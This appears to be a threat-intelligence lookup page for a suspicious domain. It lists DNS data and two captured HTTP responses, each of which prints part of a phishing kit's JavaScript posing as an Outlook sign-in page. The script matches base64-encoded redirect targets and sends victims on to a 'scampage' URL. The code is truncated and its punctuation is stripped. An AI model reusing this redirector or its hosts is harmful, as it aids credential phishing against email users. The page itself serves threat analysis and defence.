Help
RSS
API
Feed
Maltego
Contact
Domain > 559630791122980.graficaaoquadrado.com.br
×
Welcome!
Right click nodes and scroll the mouse to navigate the graph.
×
More information on this domain is in
AlienVault OTX
Is this malicious?
Yes
No
DNS Resolutions
Date
IP Address
2025-01-17
192.185.216.172
(
ClassC
)
Port 80
HTTP/1.1 200 OKDate: Sun, 30 Jun 2024 19:01:03 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charsetUTF-8 !DOCTYPE html>html>head> title>Sign in to Outlook/title> !-- Redirection By G66K --> !-- ICQ: 747246257 --> script typetext/javascript> //domain string to match if redirecting to domain var domainMatching stiga; //where go going to redirect domain name google //where to redirect scampage url var redirectUrl https://stiga.ee/uploads/STIGA/18280332/Service.html#; //redirect sperator word var redirectDelimiter bla; //enable base64 var enablebase64 true; function ValidateEmail(mail) { if (/^w+(.-?w+)*@w+(.-?w+)*(.w{2,3})+$/.test(mail)) { return true; } return false; } decodeBase64 function(s) { var e{},i,b0,c,x,l0,a,r,wString.fromCharCode,Ls.length; var AABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/; for(i0;i64;i++){eA.charAt(i)i;} for(x0;xL;x++){ ces.charAt(x);b(b6)+c;l+6; while(l>8){((a(b>>>(l-8))&0xff)||(x(L-2)))&&(r+w(a));} } return r; }; function Fired() { var getParams function (url) { var params {}; var parser document.createElement(a); parser.href url; console.log(parser); if (parser.href.match(redirectDelimiter)) { var foundRedirections parser.href.split(bla)1; console.log(foundRedirections); if (foundRedirections.match(domainMatching)) { if(enablebase64) foundRedirections decodeBase64(foundRedirections).trim(); window.location.href foundRedirections.match(http) ? foundRedirections : http:// + foundRedirections; } } var query parser.href.split(/#?&/); console.log(query); for(let param of query) { param
Port 443
HTTP/1.1 200 OKDate: Sun, 30 Jun 2024 19:01:03 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charsetUTF-8 !DOCTYPE html>html>head> title>Sign in to Outlook/title> !-- Redirection By G66K --> !-- ICQ: 747246257 --> script typetext/javascript> //domain string to match if redirecting to domain var domainMatching stiga; //where go going to redirect domain name google //where to redirect scampage url var redirectUrl https://stiga.ee/uploads/STIGA/18280332/Service.html#; //redirect sperator word var redirectDelimiter bla; //enable base64 var enablebase64 true; function ValidateEmail(mail) { if (/^w+(.-?w+)*@w+(.-?w+)*(.w{2,3})+$/.test(mail)) { return true; } return false; } decodeBase64 function(s) { var e{},i,b0,c,x,l0,a,r,wString.fromCharCode,Ls.length; var AABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/; for(i0;i64;i++){eA.charAt(i)i;} for(x0;xL;x++){ ces.charAt(x);b(b6)+c;l+6; while(l>8){((a(b>>>(l-8))&0xff)||(x(L-2)))&&(r+w(a));} } return r; }; function Fired() { var getParams function (url) { var params {}; var parser document.createElement(a); parser.href url; console.log(parser); if (parser.href.match(redirectDelimiter)) { var foundRedirections parser.href.split(bla)1; console.log(foundRedirections); if (foundRedirections.match(domainMatching)) { if(enablebase64) foundRedirections decodeBase64(foundRedirections).trim(); window.location.href foundRedirections.match(http) ? foundRedirections : http:// + foundRedirections; } } var query parser.href.split(/#?&/); console.log(query); for(let param of query) { param
View on OTX
|
View on ThreatMiner
Please enable JavaScript to view the
comments powered by Disqus.
Data with thanks to
AlienVault OTX
,
VirusTotal
,
Malwr
and
others
. [
Sitemap
]